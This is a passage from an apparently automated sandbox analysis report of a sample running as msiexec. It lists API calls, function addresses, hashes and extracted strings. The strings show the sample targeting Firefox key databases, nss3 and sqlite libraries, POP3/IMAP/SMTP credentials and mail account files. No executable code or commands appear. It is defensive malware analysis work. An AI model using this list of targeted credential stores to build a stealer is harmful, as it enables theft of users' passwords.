                                                                                              APIs
                                                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: gj
                                                                                              • API String ID: 438689982-4203073231
                                                                                              • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                              • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                              • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                              • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm$__aullrem
                                                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                              • API String ID: 643879872-978417875
                                                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040DAE3
                                                                                              • memset.MSVCRT ref: 0040DAF7
                                                                                              • memset.MSVCRT ref: 0040DB0B
                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen$_memicmp
                                                                                              • String ID: user_pref("
                                                                                              • API String ID: 765841271-2487180061
                                                                                              • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                              • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                              • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                              • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                              • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                              • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                              • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                              • memset.MSVCRT ref: 004058C3
                                                                                              • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                              • SetFocus.USER32(?), ref: 00405976
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                              • String ID:
                                                                                              • API String ID: 4281309102-0
                                                                                              • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                              • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                              • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                              • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                              APIs
                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                              • _mbscat.MSVCRT ref: 0040A8FF
                                                                                              • sprintf.MSVCRT ref: 0040A921
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite_mbscatsprintfstrlen
                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                              • API String ID: 1631269929-4153097237
                                                                                              • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                              • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                              • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                              • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040810E
                                                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,6CBC7B60,?), ref: 004081B9
                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                              • API String ID: 524865279-2190619648
                                                                                              • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                              • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00406B8E
                                                                                              • strlen.MSVCRT ref: 00406B99
                                                                                              • strlen.MSVCRT ref: 00406BFF
                                                                                              • strlen.MSVCRT ref: 00406C0D
                                                                                              • strlen.MSVCRT ref: 00406BA7
                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$_mbscat_mbscpymemset
                                                                                              • String ID: key3.db$key4.db
                                                                                              • API String ID: 581844971-3557030128
                                                                                              • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                              • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                              • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                              • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 2300387033-3849865405
                                                                                              • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                              • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004076D7
                                                                                              • sprintf.MSVCRT ref: 00407704
                                                                                              • strlen.MSVCRT ref: 00407710
                                                                                              • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                              • strlen.MSVCRT ref: 00407733
                                                                                              • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpystrlen$memsetsprintf
                                                                                              • String ID: %s (%s)
                                                                                              • API String ID: 3756086014-1363028141
                                                                                              • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                              • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                              • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                              • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                              APIs
                                                                                              • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                              • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                              • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                              Strings
                                                                                              • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                              • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                              • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                              • API String ID: 1640410171-3316789007
                                                                                              • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                              • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                              • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                              • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscat$memsetsprintf
                                                                                              • String ID: %2.2X
                                                                                              • API String ID: 125969286-791839006
                                                                                              • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                              • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                              APIs
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                              • String ID: ACD
                                                                                              • API String ID: 82305771-620537770
                                                                                              • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                              • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004091EC
                                                                                              • sprintf.MSVCRT ref: 00409201
                                                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                              • String ID: caption$dialog_%d
                                                                                              • API String ID: 2923679083-4161923789
                                                                                              • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                              • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                              Strings
                                                                                              • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                              • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                              • abort due to ROLLBACK, xrefs: 00428781
                                                                                              • unknown error, xrefs: 004277B2
                                                                                              • no such savepoint: %s, xrefs: 00426A02
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                              • API String ID: 3510742995-3035234601
                                                                                              • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                              • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                              • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                              • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                              • API String ID: 2221118986-3608744896
                                                                                              • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                              • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                              • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                              • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmpmemcpy
                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                              • API String ID: 1784268899-4153596280
                                                                                              • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                              • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                              • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                              • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                              • memset.MSVCRT ref: 00410246
                                                                                              • memset.MSVCRT ref: 00410258
                                                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                              • memset.MSVCRT ref: 0041033F
                                                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                              • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3974772901-0
                                                                                              • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                              • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                              APIs
                                                                                              • wcslen.MSVCRT ref: 0044406C
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                              • strlen.MSVCRT ref: 004440D1
                                                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                              • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 577244452-0
                                                                                              • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                              • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                              APIs
                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                              • _strcmpi.MSVCRT ref: 00404518
                                                                                              • _strcmpi.MSVCRT ref: 00404536
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcmpi$memcpystrlen
                                                                                              • String ID: imap$pop3$smtp
                                                                                              • API String ID: 2025310588-821077329
                                                                                              • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                              • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C02D
                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
